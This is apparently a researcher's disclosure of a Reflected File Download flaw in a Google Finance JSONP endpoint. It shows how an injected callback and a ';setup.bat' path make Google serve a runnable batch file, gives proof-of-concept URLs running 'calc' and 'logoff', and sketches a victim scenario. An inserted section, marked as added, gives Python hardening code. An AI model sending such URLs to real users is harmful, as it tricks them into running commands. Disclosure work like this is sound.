Found this vulnerability while auditing another client. With this RFD you don't need to create a page to force the download: the request for this Google JSON file already does that for us.
I noticed this request:
[code lang="html"]http://www.google.com/finance/info?q=ELI:ALTR&callback=?[/code]
Which returned the following information:
[code lang="html"]
// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
[/code]
I wondered if that callback parameter could be manipulated, so I injected "calc" into the request:
[code lang="html"]http://www.google.com/finance/info?q=ELI:ALTR&callback=calc[/code]
Which returned the following information:
[code lang="html"]
//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);
[/code]
Done! My injected Windows command is reflected in the body of this XHR response. Time to check if the URL is permissive:
[code lang="html"]http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc[/code]
Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.
I tried successfully with the following browsers:
- Firefox latest version
- Opera latest version
- Internet Explorer 8 and 9
What are the limitations?
I noticed in my testing that most characters are sanitized, so you can only use a single command without spaces or arguments.
Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch file is executed, the Windows calculator opens]
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch file is executed, the system logs off the authenticated user]
Possible attack scenario:
- Attacker sends the URL http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff to the victim.
- Victim downloads the file and executes it.
- After execution of the batch file, the victim is logged off from the operating system.
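The two ingredients of this RFD are a reflected callback name and a permissive URL path that lets the attacker pick the downloaded filename. The following is an added example (not code from the post or from Google) of how a JSONP endpoint can be hardened against both: the callback is validated against a strict identifier allowlist, the path is required to match its route exactly (no extra ";setup.bat" segment), and the response carries a fixed, harmless download filename plus `nosniff`. Function names (`is_valid_callback`, `path_is_canonical`, `build_jsonp_response`) and the quote object are assumptions constructed for this example.

```python
import json
import re
from typing import Any, Dict, Tuple

# Allowlist for JSONP callbacks: a JavaScript identifier, optionally dotted
# (e.g. "jQuery123.cb"). Anything else is rejected before it reaches the body.
_IDENT = r"[A-Za-z_$][A-Za-z0-9_$]{0,63}"
CALLBACK_RE = re.compile(rf"^{_IDENT}(\.{_IDENT}){{0,3}}$")

# Constructed sample resembling the quote object shown in the post.
SAMPLE_QUOTE = [{"id": "703655", "t": "ALTR", "e": "ELI", "l": "4.71"}]

# Headers that neutralise RFD even when the body contains attacker-chosen text:
# - a fixed filename/extension, so a navigation to the URL cannot become a .bat
# - nosniff, so browsers do not reinterpret the content type
# - an explicit script content type rather than text/html
HARDENED_HEADERS = {
    "Content-Type": "application/javascript; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": 'attachment; filename="f.txt"',
}


def is_valid_callback(name: str) -> bool:
    """True only for a plain (dotted) identifier; no parentheses, spaces, or quotes."""
    return bool(name) and CALLBACK_RE.fullmatch(name) is not None


def path_is_canonical(request_path: str, route: str) -> bool:
    """Reject permissive path variants such as '/finance/info;setup.bat'.

    Only the exact route (with or without a single trailing slash) is accepted,
    so the attacker cannot control the name the browser suggests for a download.
    """
    return request_path == route or request_path == route + "/"


def build_jsonp_response(
    request_path: str, route: str, callback: str, payload: Any
) -> Tuple[int, Dict[str, str], str]:
    """Return (status, headers, body) for a JSONP response hardened against RFD."""
    if not path_is_canonical(request_path, route):
        return 404, {"Content-Type": "application/json"}, json.dumps({"error": "not found"})
    if not is_valid_callback(callback):
        return 400, {"Content-Type": "application/json"}, json.dumps({"error": "bad callback"})
    # Keep the same anti-hijacking comment prefix seen in the original response.
    body = "//\n" + callback + "(" + json.dumps(payload) + ");"
    return 200, dict(HARDENED_HEADERS), body


if __name__ == "__main__":
    for path, cb in [("/finance/info", "calc"),
                     ("/finance/info;setup.bat", "calc"),
                     ("/finance/info", "alert(1)")]:
        status, headers, body = build_jsonp_response(path, "/finance/info", cb, SAMPLE_QUOTE)
        print(path, cb, "->", status, headers.get("Content-Disposition"), body[:40])
```

A callback like `calc` is still a legitimate identifier, so it is allowed; what stops the attack is that the path check removes the attacker's choice of filename and `Content-Disposition` pins the download to `f.txt`, so even a saved copy is inert text rather than a batch file.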
I made a small video that illustrates my proof-of-concept:
Google decided that this issue has very little or no security impact. Personally I don't agree, but that's my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.